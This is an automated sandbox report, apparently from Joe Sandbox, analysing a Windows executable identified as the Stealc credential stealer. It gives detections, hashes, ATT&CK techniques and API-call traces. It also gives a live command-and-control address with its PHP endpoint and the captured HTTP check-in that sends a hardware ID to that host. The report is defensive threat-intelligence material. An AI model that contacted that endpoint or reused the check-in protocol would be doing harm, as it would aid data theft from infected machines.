Source: Yara match | File source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E46C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E4630 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: aProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E2D00 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E2B00 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E2BB0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic column; a number before a technique name is the count badge shown in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus detection (Source | Detection | Scanner | Label)
file.exe | 53% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

URL detection (Source | Detection | Scanner | Label)
http://185.215.113.206/c4becf79229cb002.php/y | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php/y | 19% | Virustotal |
              No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
URLs from memory dumps (Name | Source | Malicious | Antivirus Detection | Reputation)
http://185.215.113.206/c4becf79229cb002.php/y | file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | false | 19% Virustotal; Avira URL Cloud: malware | unknown
http://185.215.113.206/1 | file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php_ | file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.1747032810.000000000051E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/L | file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/k | file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpt | file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/w | file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572084
Start date and time: 2024-12-10 04:30:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 15
• Number of non-executed functions: 130
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
                                  No simulations
IP context for 185.215.113.206 (Associated Sample Name / URL | Detection | Threat Name | Context)
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
No context
ASN context for WHOLESALECONNECTIONSNL (Associated Sample Name / URL | Detection | Threat Name | Context)
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey | 185.215.113.43
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 185.215.113.206
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
No context
No context
                                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.943746327821909
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'801'728 bytes
MD5: e814098146a7d5bb6910f684d24ddda7
SHA1: 3ac620ff3ae684e4d614ffb27821d8301f973a84
SHA256: 8bd7b0662ecb72eb60b3ae68a0534acb4a787263a37a619a48bc7a2186c4415d
SHA512: 7d3dced81670b6e318e77057bbad45d5d7d4015f08ba0548e0f52766bf6ec2d874990a2c5003f5c2d48a39801d6c5c5fe26b85cc120b2ab77a7c8f4166588c99
SSDEEP: 49152:NC3dgqyRY1d1NYSRu6+dNOpwPSmf9QlPT:4dgNRYX25rSmf2l
TLSH: 4E8533CF00EA61A1CEDD57F22A0DDBE891606C4F4D410C439CB3EEAD47963E2539B9A4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa91000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (entrypoint disassembly)
jmp 00007F055CF8129Ah
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    | 0x1000 | 0x249000 | 0x16800 | 6b1a169eca053694001d98258df97060 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .rsrc | 0x24a000 | 0x1ac | 0x200 | 011e1f51a4eee2ed7520a545567f5a64 | False | 0.576171875 | data | 4.524809607454124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    | 0x24c000 | 0x2a6000 | 0x200 | ecd9df41da24d1c11d2f53c4686879e6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   dnuvwdxn | 0x4f2000 | 0x19e000 | 0x19da00 | db4f9d5a8fcd5e72637c6cf664e3e20c | False | 0.9948512815427621 | data | 7.953787328423517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   nviifddd | 0x690000 | 0x1000 | 0x400 | cbdca69edd61df7297cdd578a01e946d | False | 0.7822265625 | data | 6.074853675743909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .taggant | 0x691000 | 0x3000 | 0x2200 | 6c5ba68e051dd9e3cf504a5b560b9c4c | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                   RT_MANIFEST | 0x68f730 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                                   DLL | Import
                                   kernel32.dll | lstrcpy
                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                   2024-12-10T04:31:05.531407+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Dec 10, 2024 04:31:03.624141932 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                   Dec 10, 2024 04:31:03.743592978 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                   Dec 10, 2024 04:31:03.743737936 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                   Dec 10, 2024 04:31:03.743999958 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                   Dec 10, 2024 04:31:03.865818977 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                   Dec 10, 2024 04:31:05.083565950 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                   Dec 10, 2024 04:31:05.083638906 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                   Dec 10, 2024 04:31:05.085763931 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                   Dec 10, 2024 04:31:05.205485106 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                   Dec 10, 2024 04:31:05.531299114 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                   Dec 10, 2024 04:31:05.531407118 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                   Dec 10, 2024 04:31:07.699397087 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                  • 185.215.113.206
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 10, 2024 04:31:03.743999958 CET | 90 | OUT | GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 10, 2024 04:31:05.083565950 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Tue, 10 Dec 2024 03:31:04 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                   Dec 10, 2024 04:31:05.085763931 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 43 38 32 32 45 36 43 41 39 32 31 32 37 33 37 30 37 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a
                                  Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="hwid"8A1C822E6CA92127370785------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build"stok------GIJJKFCGDGHDHIECGCBK--
                                   Dec 10, 2024 04:31:05.531299114 CET | 210 | IN | HTTP/1.1 200 OK
                                  Date: Tue, 10 Dec 2024 03:31:05 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=



                                  Target ID:0
                                  Start time:22:31:00
                                  Start date:09/12/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x8c0000
                                  File size:1'801'728 bytes
                                  MD5 hash:E814098146A7D5BB6910F684D24DDDA7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:4.4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:13.3%
                                    Total number of Nodes:1400
                                    Total number of Limit Nodes:24
                                    execution_graph 30172 8d3d09 244 API calls 30202 8d6709 675 API calls 30132 8e0889 1967 API calls 30173 8e2d00 11 API calls 30182 8e0a80 687 API calls 30203 8e2b00 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 30145 8d7743 1332 API calls 30146 8d86a6 48 API calls 30185 8de219 140 API calls 30192 8c5799 57 API calls 30166 8e3190 GetSystemInfo wsprintfA 30193 8ea2b0 __CxxFrameHandler 30148 8dac12 120 API calls 30149 8e082a 1977 API calls 30133 8c8ca9 malloc strcpy_s 30167 8cf9a9 144 API calls 30134 8e44a0 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 30150 8e2820 10 API calls 30151 8e3420 6 API calls 30186 8e3220 7 API calls 30135 8e84a1 121 API calls 2 library calls 30187 8e0a21 694 API calls 30195 8e93bd 129 API calls 3 library calls 30153 8d2839 290 API calls 30168 8c15b9 200 API calls 30196 8ca3b9 165 API calls 30174 8e4e55 9 API calls 30155 8d5036 295 API calls 30197 8e2bb0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 30136 8e74ce 6 API calls ctype 30175 8d0549 126 API calls 30204 8d2749 298 API calls 30137 8cd4c9 140 API calls 30156 8e8849 free free malloc free __getptd 30176 8e0946 1957 API calls 30158 8e3040 GetSystemPowerStatus 30177 8e2940 GetCurrentProcess IsWow64Process 30178 8dc559 ShellExecuteEx 30189 8c8e50 malloc strcpy_s free std::exception::exception 30190 8c7650 free ctype 28714 8e1bd0 28759 8c29a0 28714->28759 28718 8e1be3 28719 8e1c09 lstrcpy 28718->28719 28720 8e1c15 GetUserDefaultLangID 28718->28720 28719->28720 28721 8e1c3e 28720->28721 28722 8e1c28 28720->28722 28860 8e2a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 28721->28860 28722->28721 28723 8e1c36 ExitProcess 28722->28723 28725 8e1c6d lstrlen 28730 8e1c85 28725->28730 28726 8e1c43 28726->28725 29065 8e29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28726->29065 28728 8e1c57 28728->28725 28733 8e1c66 ExitProcess 28728->28733 28729 8e1ca9 lstrlen 28731 8e1cbf 28729->28731 28730->28729 28732 8e1c99 lstrcpy lstrcat 
28730->28732 28734 8e1ce0 28731->28734 28735 8e1ccc lstrcpy lstrcat 28731->28735 28732->28729 28736 8e2a70 3 API calls 28734->28736 28735->28734 28737 8e1ce5 lstrlen 28736->28737 28740 8e1cfa 28737->28740 28738 8e1d20 lstrlen 28739 8e1d36 28738->28739 28742 8e1d54 28739->28742 28743 8e1d40 lstrcpy lstrcat 28739->28743 28740->28738 28741 8e1d0d lstrcpy lstrcat 28740->28741 28741->28738 28862 8e29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28742->28862 28743->28742 28745 8e1d59 lstrlen 28746 8e1d6d 28745->28746 28747 8e1d7d lstrcpy lstrcat 28746->28747 28748 8e1d90 28746->28748 28747->28748 28749 8e1dae lstrcpy 28748->28749 28750 8e1db6 28748->28750 28749->28750 28751 8e1ddc OpenEventA 28750->28751 28752 8e1dee 28751->28752 28753 8e1e14 CreateEventA 28751->28753 28754 8e1df0 CloseHandle Sleep OpenEventA 28752->28754 28863 8e1b00 GetSystemTime 28753->28863 28754->28753 28754->28754 28758 8e1e2d CloseHandle ExitProcess 29066 8c4980 28759->29066 28761 8c29b1 28762 8c4980 2 API calls 28761->28762 28763 8c29c7 28762->28763 28764 8c4980 2 API calls 28763->28764 28765 8c29dd 28764->28765 28766 8c4980 2 API calls 28765->28766 28767 8c29f3 28766->28767 28768 8c4980 2 API calls 28767->28768 28769 8c2a09 28768->28769 28770 8c4980 2 API calls 28769->28770 28771 8c2a1f 28770->28771 28772 8c4980 2 API calls 28771->28772 28773 8c2a38 28772->28773 28774 8c4980 2 API calls 28773->28774 28775 8c2a4e 28774->28775 28776 8c4980 2 API calls 28775->28776 28777 8c2a64 28776->28777 28778 8c4980 2 API calls 28777->28778 28779 8c2a7a 28778->28779 28780 8c4980 2 API calls 28779->28780 28781 8c2a90 28780->28781 28782 8c4980 2 API calls 28781->28782 28783 8c2aa6 28782->28783 28784 8c4980 2 API calls 28783->28784 28785 8c2abf 28784->28785 28786 8c4980 2 API calls 28785->28786 28787 8c2ad5 28786->28787 28788 8c4980 2 API calls 28787->28788 28789 8c2aeb 28788->28789 28790 8c4980 2 API calls 28789->28790 28791 8c2b01 28790->28791 28792 8c4980 2 API calls 28791->28792 28793 8c2b17 28792->28793 
28794 8c4980 2 API calls 28793->28794 28795 8c2b2d 28794->28795 28796 8c4980 2 API calls 28795->28796 28797 8c2b46 28796->28797 28798 8c4980 2 API calls 28797->28798 28799 8c2b5c 28798->28799 28800 8c4980 2 API calls 28799->28800 28801 8c2b72 28800->28801 28802 8c4980 2 API calls 28801->28802 28803 8c2b88 28802->28803 28804 8c4980 2 API calls 28803->28804 28805 8c2b9e 28804->28805 28806 8c4980 2 API calls 28805->28806 28807 8c2bb4 28806->28807 28808 8c4980 2 API calls 28807->28808 28809 8c2bcd 28808->28809 28810 8c4980 2 API calls 28809->28810 28811 8c2be3 28810->28811 28812 8c4980 2 API calls 28811->28812 28813 8c2bf9 28812->28813 28814 8c4980 2 API calls 28813->28814 28815 8c2c0f 28814->28815 28816 8c4980 2 API calls 28815->28816 28817 8c2c25 28816->28817 28818 8c4980 2 API calls 28817->28818 28819 8c2c3b 28818->28819 28820 8c4980 2 API calls 28819->28820 28821 8c2c54 28820->28821 28822 8c4980 2 API calls 28821->28822 28823 8c2c6a 28822->28823 28824 8c4980 2 API calls 28823->28824 28825 8c2c80 28824->28825 28826 8c4980 2 API calls 28825->28826 28827 8c2c96 28826->28827 28828 8c4980 2 API calls 28827->28828 28829 8c2cac 28828->28829 28830 8c4980 2 API calls 28829->28830 28831 8c2cc2 28830->28831 28832 8c4980 2 API calls 28831->28832 28833 8c2cdb 28832->28833 28834 8c4980 2 API calls 28833->28834 28835 8c2cf1 28834->28835 28836 8c4980 2 API calls 28835->28836 28837 8c2d07 28836->28837 28838 8c4980 2 API calls 28837->28838 28839 8c2d1d 28838->28839 28840 8c4980 2 API calls 28839->28840 28841 8c2d33 28840->28841 28842 8c4980 2 API calls 28841->28842 28843 8c2d49 28842->28843 28844 8c4980 2 API calls 28843->28844 28845 8c2d62 28844->28845 28846 8e63c0 GetPEB 28845->28846 28847 8e65f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 28846->28847 28848 8e63f3 28846->28848 28849 8e6668 28847->28849 28850 8e6655 GetProcAddress 28847->28850 28855 8e6407 20 API calls 28848->28855 28851 8e669c 28849->28851 28852 8e6671 GetProcAddress GetProcAddress 
28849->28852 28850->28849 28853 8e66b8 28851->28853 28854 8e66a5 GetProcAddress 28851->28854 28852->28851 28856 8e66d4 28853->28856 28857 8e66c1 GetProcAddress 28853->28857 28854->28853 28855->28847 28858 8e66dd GetProcAddress GetProcAddress 28856->28858 28859 8e6707 28856->28859 28857->28856 28858->28859 28859->28718 28861 8e2ac4 28860->28861 28861->28726 28862->28745 29071 8e1800 28863->29071 28865 8e1b61 sscanf 29110 8c2930 28865->29110 28868 8e1bc9 28871 8e01d0 28868->28871 28869 8e1bb6 28869->28868 28870 8e1bc2 ExitProcess 28869->28870 28872 8e01fa 28871->28872 28873 8e0229 lstrcpy 28872->28873 28874 8e0235 28872->28874 28873->28874 28875 8e024b lstrlen 28874->28875 28876 8e0268 28875->28876 28877 8e027f lstrcpy 28876->28877 28878 8e028b lstrlen 28876->28878 28877->28878 28879 8e02a8 28878->28879 28880 8e02bf lstrcpy 28879->28880 28881 8e02cb lstrlen 28879->28881 28880->28881 28882 8e02e8 28881->28882 28883 8e02ff lstrcpy 28882->28883 28884 8e030b 28882->28884 28883->28884 29112 8e1550 28884->29112 28887 8e0339 28888 8e035c lstrlen 28887->28888 28889 8e0350 lstrcpy 28887->28889 28890 8e0376 28888->28890 28889->28888 28891 8e038d lstrcpy 28890->28891 28892 8e0399 lstrlen 28890->28892 28891->28892 28893 8e03b0 28892->28893 28894 8e03c4 lstrcpy 28893->28894 28895 8e03d0 lstrlen 28893->28895 28894->28895 28896 8e0407 28895->28896 28897 8e041b lstrcpy 28896->28897 28898 8e0427 28896->28898 28897->28898 29122 8c2d90 28898->29122 28906 8e0699 28907 8e1550 4 API calls 28906->28907 28908 